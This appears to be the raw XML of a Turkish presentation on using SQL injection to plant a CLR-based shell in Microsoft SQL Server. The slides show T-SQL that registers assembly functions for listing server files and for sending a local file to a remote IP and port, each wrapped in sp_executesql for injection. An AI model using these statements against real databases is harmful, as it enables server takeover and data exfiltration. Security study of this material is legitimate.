            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="1111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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435229" y="667724"/>
            <a:ext cx="8587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CREATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUNCTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>dbo.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyalariListeleTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(4000))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RETURNS TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (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Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NVARCHAR(MAX)) AS EXTERNAL NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.SqlServer]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-T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[Microsoft.SqlServer.SqlExternalShell]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyalariListeleTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p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69" y="1814156"/>
            <a:ext cx="8443307" cy="3752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8969" y="5566737"/>
            <a:ext cx="11185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 smtClean="0"/>
              <a:t>FIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>: EXEC sp_executesql N'CREATE FUNCTION dbo.DosyalariListeleTable(@path nvarchar(4000)) RETURNS TABLE (Files NVARCHAR(MAX)) AS EXTERNAL NAME [Microsoft.SqlServer].[Microsoft.SqlServer.SqlExternalShell].DosyalariListeleTable;'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19106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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="11116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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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68" y="996153"/>
            <a:ext cx="7077075" cy="4410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108" y="583473"/>
            <a:ext cx="4657725" cy="227647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189615" y="1230284"/>
            <a:ext cx="3017520" cy="299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8460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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="1111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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15</a:t>
            </a:r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618110" y="1032404"/>
            <a:ext cx="8587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CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>dbo.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyalariListele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>nvarchar(4000)) AS EXTERNAL NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[Microsoft.SqlServer]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-T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[Microsoft.SqlServer.SqlExternalShell]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyalariListele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618110" y="1866055"/>
            <a:ext cx="1118596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 smtClean="0"/>
              <a:t>FIX: EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>sp_executesql N'CREATE PROCEDURE dbo.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" b="1" dirty="0"/>
              <a:t>DosyalariListele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" b="1" dirty="0"/>
              <a:t>@path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>nvarchar(4000)) AS EXTERNAL NAME [Microsoft.SqlServer].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" b="1" dirty="0"/>
              <a:t>[Microsoft.SqlServer.SqlExternalShell]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" b="1" dirty="0"/>
              <a:t>DosyalariListele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="11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834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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>SQL INJECTION VE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="4031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 smtClean="0"/>
              <a:t>https://www.github.com/ibrahimbalic/sqlinjectionshell/mssql</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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74586042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1910080" y="2899954"/>
          <a:ext cx="8128000" cy="1515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1002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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="1111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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15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36" y="1050994"/>
            <a:ext cx="9972675" cy="461962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728754" y="1769277"/>
            <a:ext cx="2126518" cy="268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4211" y="1688094"/>
            <a:ext cx="4904182" cy="19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09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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="6001788"/>
            <a:ext cx="1111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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435229" y="667724"/>
            <a:ext cx="8587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CREATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUNCTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>dbo.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyaYolla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@localfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(4000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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r-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@remoteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(4000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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r-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@remoteip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(4000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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r-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@remoteport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(4000))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RETURNS TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(NVARCHAR(MAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)) AS EXTERNAL NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.SqlServer]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-T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[Microsoft.SqlServer.SqlExternalShell]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DosyaYolla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p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578969" y="5566737"/>
            <a:ext cx="11185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 smtClean="0"/>
              <a:t>FIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0"/>
              <a:t>: EXEC sp_executesql N'CREATE FUNCTION dbo.DosyaYolla(@localfile nvarchar(4000),@remoteFile nvarchar(4000),@remoteip nvarchar(4000),@remoteport nvarchar(4000))  RETURNS NVARCHAR(MAX) AS EXTERNAL NAME [Microsoft.SqlServer].[Microsoft.SqlServer.SqlExternalShell].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>DosyaYolla;'</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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58" y="1933548"/>
            <a:ext cx="111537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5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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-assembly-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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929" y="757373"/>
            <a:ext cx="81248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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-assembly-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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254" y="1190353"/>
            <a:ext cx="8191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45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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-assembly-transact-sql?view=sql-server-ver15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254" y="1342163"/>
            <a:ext cx="81915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06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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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831" y="1131026"/>
            <a:ext cx="82391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4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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15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348" y="1044892"/>
            <a:ext cx="81629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4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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
